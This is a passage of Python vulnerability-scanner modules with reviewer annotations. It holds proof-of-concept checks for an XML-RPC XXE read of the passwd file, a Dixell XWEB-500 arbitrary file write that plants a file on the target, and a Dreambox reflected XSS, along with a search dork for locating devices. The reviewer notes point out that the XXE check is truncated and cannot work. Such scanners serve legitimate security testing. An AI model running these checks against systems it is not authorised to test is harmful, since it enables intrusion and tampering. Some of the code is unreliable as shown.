    """POST an XML body to the xmlrpc endpoint and look for a passwd-style line.

    Returns ``{"success": True, ...}`` on a match, ``{}`` when nothing
    matched, ``{"success": False}`` on any exception.

    NOTE(review): this module imports only ``requests``; ``re`` is never
    imported, so ``re.search`` below raises NameError on every call. The bare
    except converts that into ``{"success": False}``, which means this check
    cannot currently report a positive and is indistinguishable from an
    unreachable target. Also, the request body as shown in this listing looks
    truncated (only ``]>&disclose;`` survives), so do not take the string
    below as the module's real content.
    """
    result = {}
    try:
        url = format_url(url)

        path = """/webtools/control/xmlrpc"""
        method = "POST"
        data = """]>&disclose;"""
        headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'application/xml'}
        # verify=False disables TLS certificate validation; redirects are not followed.
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        # `re` is not in scope in this file (see docstring) -- NameError here.
        if (re.search(r"""root:.*:0:0:""",resp0.text)) and (resp0.status_code == 200):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    # NOTE(review): bare except hides the NameError above as well as network errors.
    except:
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url: str) -> dict:
    """Exploit entry point; identical to ``poc()`` for this module."""
    return poc(url)


# Utils
def format_url(url: str) -> str:
    """Normalise a target string: trim whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url


# ---- /modules/vulnerabilities/other/dixell-xweb500-filewrite.py ----
import requests


# Vuln Base Info
def info() -> dict:
    """Return the static metadata record for this check.

    NOTE(review): ``description``, ``cvss-*``, ``cve-id`` and ``cwe-id`` are
    all blank; only the exploit-db reference identifies the issue.
    """
    return {
        "author": "cckuailong",
        "name": '''Dixell XWEB-500 - Arbitrary File Write''',
        "description": '''''',
        "severity": "critical",
        "references": [
            "https://www.exploit-db.com/exploits/50639"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata":{
            "vuln-target": "",
            "google-dork":'''inurl:"xweb500.cgi"'''
        },
        "tags": ["lfw", "iot", "dixell", "xweb500"],
    }


# Vender Fingerprint
def fingerprint(url: str) -> bool:
    """Vendor pre-check; unconditionally True."""
    return True

# Proof of Concept
def poc(url: str) -> dict:
    """Two-step check: upload a marker via the logo CGI, then read it back.

    Returns ``{"success": True, ...}`` when the read-back returns HTTP 200
    containing the marker, ``{}`` when it does not, ``{"success": False}``
    on any exception.

    NOTE(review): unlike the other modules in this listing this ``poc()`` is
    state-changing -- it writes ``/logo/test.txt`` on the target and never
    removes it. Run it only where a write is acceptable, and note that
    ``result["payload"]`` records the second (read-back) URL, because
    ``path`` has been reassigned by the time it is stored.
    """
    result = {}
    try:
        url = format_url(url)

        path = """/cgi-bin/logo_extra_upload.cgi"""
        method = "POST"
        # Multi-line body: first line is the file name, second the marker content.
        # The exact leading whitespace of the second line is not recoverable from this listing.
        data = """test.txt
dixell-xweb500-filewrite"""
        headers = {'Content-Type': 'application/octet-stream'}
        # verify=False disables TLS certificate validation; redirects are not followed.
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        # resp0 is never inspected; success is judged solely on the read-back below.
        path = """/logo/test.txt"""
        method = "GET"
        data = """"""
        headers = {}
        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        if resp1.status_code == 200 and "dixell-xweb500-filewrite" in resp1.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    # NOTE(review): bare except swallows every exception and reports success=False.
    except:
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url: str) -> dict:
    """Exploit entry point; identical to ``poc()`` (including the file write)."""
    return poc(url)


# Utils
def format_url(url: str) -> str:
    """Normalise a target string: trim whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url


# ---- /modules/cves/2017/CVE-2017-15287.py ----
import requests


# Vuln Base Info
def info() -> dict:
    """Return the static metadata record for this check."""
    return {
        "author": "cckuailong",
        "name": '''Dreambox WebControl Reflected XSS''',
        "description": '''There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.''',
        "severity": "medium",
        "references": [
            "https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf",
            "https://www.exploit-db.com/exploits/42986/"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "cvss-score": "",
            "cve-id": "CVE-2017-15287",
            "cwe-id": "CWE-79"
        },
        "metadata":{
            "vuln-target": "",
        },
        "tags": ["cve", "cve2017", "xss", "dreambox"],
    }


# Vender Fingerprint
def fingerprint(url: str) -> bool:
    """Vendor pre-check; unconditionally True."""
    return True

# Proof of Concept
def poc(url: str) -> dict:
    """GET /webadmin/pkg with an empty command and look for the error echo.

    Returns ``{"success": True, ...}`` when the body contains
    "Unknown command: ", ``{}`` otherwise, ``{"success": False}`` on any
    exception.

    NOTE(review): as shown in this listing the ``command`` value is empty and
    the match is only on the error-string prefix, so a positive confirms that
    the endpoint exists and echoes an error -- it does not demonstrate that
    the parameter is reflected unescaped. The status code is not checked at
    all. (The value may have been lost in extraction; confirm against the
    repository.)
    """
    result = {}
    try:
        url = format_url(url)

        path = """/webadmin/pkg?command="""
        method = "GET"
        data = """"""
        # Content-Type is sent on a GET with an empty body; it has no effect on the check.
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        # verify=False disables TLS certificate validation; redirects are not followed.
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        if ("""Unknown command: """ in resp0.text):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    # NOTE(review): bare except swallows every exception and reports success=False.
    except:
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url: str) -> dict:
    """Exploit entry point; identical to ``poc()`` for this module."""
    return poc(url)


# Utils
def format_url(url: str) -> str:
    """Normalise a target string: trim whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url